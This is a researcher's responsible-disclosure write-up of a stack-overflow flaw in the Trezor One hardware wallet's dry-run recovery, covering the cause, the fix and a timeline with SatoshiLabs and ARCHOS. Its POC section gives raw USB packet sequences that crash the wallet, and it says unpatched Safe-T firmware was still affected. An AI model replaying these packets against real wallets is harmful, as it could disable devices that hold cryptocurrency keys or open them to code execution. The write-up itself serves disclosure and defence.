Trezor One dry-run recovery vulnerability

In the first half of 2018, I found a number of security issues in the Trezor One hardware wallet during my master thesis on fuzzing and verification. Most of the issues were discovered through the powerful combination of fuzzing with libFuzzer and error detection via sanitizers such as Address Sanitizer and Undefined Behavior Sanitizer.

This article is about the stack-overflow vulnerability in the Trezor One BIP39 dry-run recovery functionality that was fixed with the 1.6.2 firmware release in June 2018.

See the next article for the buffer overflow issue I also found during my academic research.

Technical background
The vulnerability
Responsible disclosure

Consulting

I’m a freelance Security Consultant and currently available for new projects. If you are looking for assistance to secure your projects or organization, contact me.

Technical background

The private key at the heart of a cryptocurrency hardware wallet is usually exposed to the owner of the device only once during the initial wallet configuration via a so-called seed phrase which conforms to the BIP39 standard. This ensures that the owner can create an appropriate backup of the key (e.g., on paper or another other non-digital medium) and restore it later on a different device. Having a backup in a secure location is particularly useful in case of device malfunction, device loss, migration between products and so on.

Correspondingly, the Trezor One wallet can be initialized directly from a pre-existing BIP39 seed phrase to import the wallet(s) associated with this private key. This procedure is called recovery. Since the host computer cannot be trusted due to potential malware infections, the recommended “advanced recovery” (1) method implemented on the Trezor One is designed to use a special word matrix on the OLED display to reduce the information that can be inferred by the host computer about the entered private key.

To give users the assurance that their copy of the seed phrase is correct and does correspond to the actively used wallet on the device, there is a so-called dry-run recovery variant (1, 2) on the Trezor One which offers a similar BIP39 recovery dialog on a fully-initialized device. This dry-run recovery only performs a comparison of the seed phrases and does not change the device state.

The vulnerability

Once the dry run recovery procedure is in progress, a number of USB packets containing the user choices corresponding to the scrambled word input selections are sent from the host to the device. Once a complete word is selected, it is highlighted for 250ms by the following code:

static void recovery_digit(const char digit) {
    // [...]
    if ((word_index % 4) == 3) {
        // [...]

        /* Mark the chosen word for 250 ms */
        int y = 54 - ((digit - '1')/3)*11;
        int x = 64 * (((digit - '1') % 3) > 0);
        oledInvert(x + 1, y, x + 62, y + 9);
        oledRefresh();
        usbSleep(250);

recovery.c As with other lengthy device procedures, the user might decide to abort the dry-run recovery procedure without performing a restart of the device. This can be signaled by the host with e.g., a protobuf message of type MessageType_Cancel encoded in an USB packet.

To allow the abort to happen during the wait period of the word display, the usbSleep function is used. It is the job of usbSleep to detect and parse new USB packets via busy polling during this “sleep” phase:

void usbSleep(uint32_t millis) {
  uint32_t start = timer_ms();

  while ((timer_ms() - start) < millis) {
    if (usbd_dev != NULL) {
      usbd_poll(usbd_dev);

usb.c

The flaw in recovery_digit is that the state machine should only allow a few specific USB messages of the so-called tiny message type subset while the recovery is going on, but the corresponding limit flag is not set, and so all types of packets are accepted and processed.

As a result, it is possible for an attacker to send another USB packet which triggers the exact same code path in recovery_digit again during this 250ms sleep period. Since this nesting can be done recursively, at some point the limited stack on the device will no longer be able to contain all relevant information of the recursive calls and overflow, potentially allowing the attacker to hijack the program execution.

Note that this attack does not require a high timing accuracy for the packet transmissions to work.

The fix

To solve the recursion issue, the usbTiny() function was used to limit the type of allowed USB packets during the sleep:

// [...]
oledRefresh();
usbTiny(1);
usbSleep(250);
usbTiny(0);

usb.c

Attack scenario and security implications

Preconditions for the attack:

The ability to send USB packets to the device
- -> malware on the host with user permissions
The target device must be in an unlocked state
- automatically the case if no PIN is configured
- otherwise: PIN entry by the owner
(Some versions) Button confirmation by the user
- accepting the dry run procedure

Malware on the host computer can wait until the user unlocks the device to perform some “regular” operations. It is important in this context that the dry-run recovery does not require a mandatory second PIN entry or button confirmation on the Trezor One on many firmware versions, which makes this issue easier to exploit. The attack itself takes less than two seconds.

Assessing the exact security impact on the different firmware versions is difficult due to individual memory layouts and protection levels. It should be assumed that this vulnerability can be leveraged to change the control flow or get arbitrary code execution on some versions.

Mitigations

The most relevant protections are the stack canary and the MPU configuration of the microcontroller. The exact configurations are different between firmware versions. Newer versions like the Trezor One 1.6.1 have the strongest mitigations in place.

However, as far as I’m aware these mitigations only make successful exploitation significantly harder, but not impossible.

POC

Trezor One

The following sequence of USB packets will cause the device to hang:

# 1x - reset previous actions (optional)
?##\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 1x - start the advanced matrix recovery
?##\x00-\x00\x00\x00\x1e\x08\x0c\x10\x00\x18\x00"\x07english*\x05label0\x00@\x01HdP\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 1x - acknowledge button request
# only necessary on Trezor One fw. 1.6.1
?##\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 3x - send digit decision to confirm the first word and trigger the initial usbSleep() time window
?##\x00/\x00\x00\x00\x03\n\x011\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 300x / 309x / 313x - send more digit decision packets to trigger the recursion issue
# the necessary number of necessary packets depends on the firmware version
?##\x00/\x00\x00\x00\x03\n\x011\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

This sequence was tested on firmware versions 1.5.2, 1.6.0 and 1.6.1.

Safe-T

On the newest Safe-T firmware 1.1.3, a similar sequence of packets leads to two different faults.
Note that on this device, user interaction via a button confirmation is necessary.

Memory fault:

Memory fault after launching the USB exploit

Stack smashing fault:

Stack smashing fault after launching the USB exploit

As an interesting detail, in the stack smashing case there are a number of artifacts on the display at 0:05 shortly before the stack smashing is detected. This suggests that this attack can be leveraged to cause more serious impact than a denial of service:

Responsible disclosure

Initial disclosure

I responsibly disclosed the issue to SatoshiLabs through my thesis advisor Dr. Jochen Hoenicke who also suggested the relevant patch. The issue was fixed quickly with a firmware release after ~32 days.

I co-authored the public disclosure article on the issue.

Second disclosure

During the OLED information leak issue in mid-2019, I found that the firmware of the ARCHOS Safe-T hardware wallet also contained the vulnerable code and was not yet fixed after ~12 months of the issue being public. I notified ARCHOS privately and urged them to patch the issue as soon as possible. They confirmed the vulnerability in early July and indicated that they were planning to do a firmware release within two weeks.

In late July, they announced that the beta firmware was ready and that the GitHub repository would be updated soon.

Unfortunately, I have not heard back from ARCHOS as of 2019-12-09 despite multiple attempts to reach them. The last commit to their public GitHub repository was almost a year ago. The newest firmware version 1.1.3 is still vulnerable, as shown in the POC section.

Relevant products

product	source	fixed version	vendor references
SatoshiLabs Trezor One	GitHub	1.6.2	Issue disclosure post, General release notes
Archos Safe-T	GitHub	no public patch in the repository, see (1)	no public report

Detailed timeline

Date	info
2018-05-25	Issue is described to Dr. Hoenicke and disclosed to SatoshiLabs
2018-05-29	Internal patch is available
2018-06-04	Planned release date: 2019-06-13
2018-06-25	Firmware v1.6.2 is released
2018-06-25	Public blog post on the general firmware update
2018-07-12	Public disclosure of the vulnerability via Trezor blog post
~~~~
2019-05-04	First attempt to reach ARCHOS development team
2019-06-28	First response from ARCHOS development team
2019-07-01	Detailed notice to ARCHOS development team about unpatched status of Safe-T
2019-07-01	ARCHOS acknowledges the issue
2019-07-12	ARCHOS reports internal evaluation of the patch
2019-07-25	ARCHOS reports that the firmware fix will be released soon
2019-08-10	Request to ARCHOS for a response
2019-10-14	Request to ARCHOS for a response
2019-11-27	Request to ARCHOS for a response
2019-12-07	Request to ARCHOS for a response

Credit

I would like to credit Dr. Jochen Hoenicke as a co-author of this discovery and thank Dr. Daniel Dietsch for his general assistance and supervision during the thesis.

Bug bounty

SatoshiLabs provided a bug bounty for this issue.

Contents